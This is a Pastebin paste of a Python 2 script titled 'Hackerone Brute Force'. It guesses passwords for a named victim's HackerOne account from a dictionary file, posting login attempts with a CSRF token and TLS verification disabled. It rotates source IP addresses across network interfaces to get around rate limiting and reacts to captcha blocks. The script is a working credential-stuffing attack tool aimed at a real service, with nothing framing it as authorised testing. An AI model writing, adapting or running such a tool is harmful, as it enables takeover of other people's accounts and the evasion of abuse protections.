API tools faq
paste
Advertisement
Guest User

Hackerone Brute Force

a guest
Oct 6th, 2017
82
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.84 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/env python
  2. # sudo apt-get update && sudo apt-get --yes --force-yes upgrade && sudo apt-get --yes --force-yes install python-pip && sudo apt-get --yes --force-yes install python-dev && sudo pip install requests --upgrade && sudo pip install requests_toolbelt --upgrade && sudo pip install netifaces --upgrade
  3.  
  4. import requests
  5. import time
  6. import json
  7. import sys
  8. import os
  9. import threading
  10. import Queue
  11. import requests
  12. import netifaces
  13. from requests_toolbelt.adapters import source
  14.  
  15. requests.packages.urllib3.disable_warnings()
  16.  
  17. class WorkerThread(threading.Thread):
  18. good_guess = "valid-credentials"
  19. bad_guess = "invalid-credentials"
  20.  
  21. def __init__(self, queue, tid, ips, user, debug) :
  22. threading.Thread.__init__(self)
  23. self.queue = queue
  24. self.tid = tid
  25. self.user = user
  26. self.debug = debug
  27. self.session = requests.Session()
  28. self.counter = 0
  29. self.ips = ips
  30.  
  31. response = self.session.get("https://hackerone.com/current_user")
  32. self.csrf = response.json()["csrf_token"]
  33.  
  34. def run(self):
  35. while True:
  36. try :
  37. password = self.queue.get(timeout=1)
  38. except Queue.Empty :
  39. return
  40.  
  41. #if self.debug:
  42. #print "[THREAD " + str(self.tid) + "] New attempt for " + self.user + ":" + password
  43.  
  44. while True:
  45. #time.sleep(4)
  46. try:
  47. ip = self.ips[self.counter]
  48. if self.counter == len(self.ips) - 1:
  49. self.counter = 0
  50. else:
  51. self.counter = self.counter + 1
  52. self.session.mount('http://', source.SourceAddressAdapter(ip))
  53. self.session.mount('https://', source.SourceAddressAdapter(ip))
  54. r = self.session.post("https://hackerone.com/sessions", headers={"Accept":"*/*","X-CSRF-Token":self.csrf}, data={"email":victimusername,"password":password}, verify=False)
  55. except:
  56. print "[THREAD " + str(self.tid) + "] Error during POSTing. Retrying..."
  57. continue
  58. if r.status_code == 200 and r.json()['result_code'] == self.good_guess:
  59. print "[SUCCESS] Found the right password: " + password
  60. exit(0)
  61. elif r.status_code == 200 and r.json()['result_code'] == self.bad_guess:
  62. if self.debug:
  63. print "[THREAD " + str(self.tid) + "] wrong password guess: " + password
  64. elif r.status_code == 429:
  65. #if self.debug:
  66. print "[THREAD " + str(self.tid) + "] Rate limit triggered, sleeping now."
  67. time.sleep(5)
  68. continue
  69. elif r.status_code == 403:
  70. #if self.debug:
  71. print "[THREAD " + str(self.tid) + "] Cloudflare captcha, killing this thread."
  72. exit(0)
  73. else:
  74. print r.text
  75. print r.status_code
  76. pass
  77. break
  78.  
  79. self.queue.task_done()
  80.  
  81. if len(sys.argv) < 5:
  82. print "[INFO] Usage: python " + sys.argv[0] + " <USERNAME> <PASSWORD_DICTIONARY_FILENAME> <INTERFACES (CSV)> <THREADS> [DEBUG]"
  83. exit(0);
  84.  
  85. victimusername = sys.argv[1]
  86. dictionaryname = sys.argv[2]
  87. interfaces = sys.argv[3].split(',')
  88. nbthreads = int(sys.argv[4])
  89. debug = False
  90. if len(sys.argv) > 5:
  91. debug = True
  92.  
  93. ips = []
  94. for interface in interfaces:
  95. if interface in netifaces.interfaces():
  96. for ipv4 in netifaces.ifaddresses(interface)[netifaces.AF_INET]:
  97. if not (ipv4['addr'].split('.')[0] == "10" or ipv4['addr'].split('.')[0] == "127"):
  98. if debug:
  99. print "[INFO] Interface " + interface + " - IPv4 Address " + ipv4['addr']
  100. ips.append(ipv4['addr'])
  101. for ipv6 in netifaces.ifaddresses(interface)[netifaces.AF_INET6]:
  102. if not ipv6['addr'].split(':')[0] == "fe80":
  103. if debug:
  104. print "[INFO] Interface " + interface + " - IPv6 Address " + ipv6['addr'].split('%')[0]
  105. ips.append(ipv6['addr'].split('%')[0])
  106.  
  107. queue = Queue.Queue()
  108.  
  109. passwordList = open(dictionaryname,'r').read().splitlines()
  110. total = len(passwordList)
  111.  
  112. for password in passwordList :
  113. queue.put(password.strip()) # Push passwords onto queue
  114.  
  115. start = time.time()
  116. threads = []
  117. nbinterfacesperthread = len(ips) / nbthreads
  118.  
  119. print "[INFO] Number of interfaces: " + str(len(ips))
  120. print "[INFO] Number of interfaces per thread: " + str(nbinterfacesperthread)
  121. print "[INFO] Total # threads: " + str(nbthreads)
  122. print "[INFO] Total # passwords: " + str(total)
  123.  
  124. for i in range(0,nbthreads): # Loop through external IP addresses
  125. worker = WorkerThread(queue, i, ips[i*nbinterfacesperthread:(i+1)*nbinterfacesperthread], victimusername, debug)
  126. worker.setDaemon(True)
  127. worker.start()
  128. threads.append(worker)
  129.  
  130. while any(i.is_alive() for i in threads):
  131. time.sleep(5)
  132. current = total - queue.qsize()
  133. seconds = (int)(time.time() - start)
  134.  
  135. if current == total:
  136. for x in threads:
  137. x.join()
  138.  
  139. percent = (current / float(total))
  140. speed = current / float(seconds)
  141. bar = ('=' * int(percent * 20))
  142. perc = int(percent * 100)
  143. sys.stdout.write("%.2f pw/s [%s] %s%% (%s/%s) \n" % (speed, bar, perc,current,total))
  144. sys.stdout.flush()
  145.  
  146. print "[End] Total time: " + str((int)(time.time() - start)) + " seconds"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!